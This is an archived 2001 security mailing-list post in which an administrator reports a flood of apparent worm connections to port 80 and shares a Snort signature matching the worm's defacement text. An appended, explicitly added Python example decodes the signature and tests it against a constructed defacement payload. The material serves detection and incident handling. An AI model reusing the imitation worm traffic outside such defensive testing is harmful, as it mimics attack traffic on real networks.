Hi guys,

From Thursday last week, I have had thousands (21296) of attempted connects from thousands (7650) of hosts to port 80 on a host on my network that does not have a web server running. I decided to open this up on my firewall and set up a small honeypot to see what the traffic was about. Lo and behold:

18:59:07.487672 210.239.180.224.32769 > 194.130.109.164.80: P [tcp sum ok] 2925:4040(1115) ack 1 win 17520 (DF) (ttl 104, id 46743, len 1155)
Any ideas? If this is a worm, it's already got 7650 hosts.

I'm logging all of this on my IDS hosts with the following signature:

alert TCP $EXTERNAL any -> $INTERNAL any (msg: "Hacked by Chinese"; dsize: >1000; flags: P+; content: "|2e776f72 6d2e636f 6d20213c 62723e3c|";)

Having just written the rule and popped it in the IDS, I've seen 34 connections from 11 different hosts. Looks bad.

Rgds,

--
Scott Nursten - Systems Administrator
----------------------------------------------
ddi: +44 (0) 1293 744 122
work: +44 (0) 1293 402 040
fax: +44 (0) 1293 402 050
email: scottnat_private
wwweb: http://www.streetsonline.co.uk
----------------------------------------------
"Without order nothing can exist - without chaos nothing can evolve."

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
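To show what the signature posted above actually tests for, here is an added example (not from the original post or from any IDS) that decodes the Snort-style content pattern into bytes and applies the rule's three checks (dsize > 1000, PSH flag, content match) to a constructed payload modelled on the defacement text in the capture.

```python
# Added example, not part of the original post: apply the checks of the quoted
# Snort-style rule to a constructed payload. Nothing here is captured traffic.

RULE_CONTENT = "|2e776f72 6d2e636f 6d20213c 62723e3c|"   # content: from the rule


def parse_content(pattern: str) -> bytes:
    """Turn a Snort content string into raw bytes.

    Segments between '|' pipes are hex (whitespace ignored); text outside
    the pipes is taken literally.
    """
    out = bytearray()
    for i, part in enumerate(pattern.split("|")):
        if i % 2 == 1:                       # inside pipes: hex bytes
            out += bytes.fromhex(part.replace(" ", ""))
        else:                                # outside pipes: literal text
            out += part.encode("latin-1")
    return bytes(out)


def rule_matches(payload: bytes, tcp_flags: str) -> bool:
    """dsize: >1000; flags: P+ (PSH plus anything); content present."""
    if len(payload) <= 1000:
        return False
    if "P" not in tcp_flags:
        return False
    return parse_content(RULE_CONTENT) in payload


# Constructed sample payload (assumption, not captured data): the defacement
# page text seen in the capture, space-padded to the 1115-byte segment size.
SAMPLE_PAYLOAD = (
    b"GET ? HTTP/1.0\r\nHOST:www.worm.com\r\n\r\n"
    b"<html><head><title>HELLO!</title></head><bady>"
    b"Welcome to http://www.worm.com !<br><br>Hacked By Chinese!"
    b"</bady></html>"
).ljust(1115, b" ")

if __name__ == "__main__":
    print(parse_content(RULE_CONTENT))             # b'.worm.com !<br><'
    print(rule_matches(SAMPLE_PAYLOAD, "PA"))      # True
    print(rule_matches(SAMPLE_PAYLOAD[:800], "P")) # False: dsize too small
```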
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 12:44:18 PDT